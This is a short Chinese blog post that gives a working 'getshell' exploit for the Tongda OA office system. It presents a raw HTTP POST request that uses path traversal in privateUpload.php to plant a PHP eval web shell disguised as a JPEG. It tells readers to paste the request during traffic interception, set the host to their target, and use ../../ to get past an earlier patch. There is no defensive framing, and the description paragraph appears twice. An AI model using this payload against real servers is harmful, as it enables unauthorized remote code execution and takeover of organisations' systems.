通达OAgetshell

  • A+
所属分类:javasec_cn
摘要

描述:
将一下playload在抓包的时候粘贴,host修改目标地址,之前乌云很多人只知道上传,修复之后就不可以了
但是../../可以转到二级目录依旧可以成功。
PS:返回200才能成功
playload:

描述:
将一下playload在抓包的时候粘贴,host修改目标地址,之前乌云很多人只知道上传,修复之后就不可以了
但是../../可以转到二级目录依旧可以成功。
PS:返回200才能成功
playload:

POST /general/vmeet/privateUpload.php?fileName=../../upload.php+ HTTP/1.1 Host: %s Proxy-Connection: keep-alive Content-Length: 216 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: null User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36 Content-Type: multipart/form-data; boundary=—-WebKitFormBoundaryNwKj3xvHABLIBZ0A Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8 Cookie: PHPSESSID=9dfe93a1460440b70671e02e6d56dee0; ASP.NET_SessionId=nlxeowqes0yagtztlq5mgx45; tongji=1; referer=  ——WebKitFormBoundaryNwKj3xvHABLIBZ0A Content-Disposition: form-data; name=“Filedata”; filename=“2.jpg” Content-Type: image/jpeg <?php @eval($_POST['muma']);?> ——WebKitFormBoundaryNwKj3xvHABLIBZ0A– 

效果:
通达OAgetshell

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: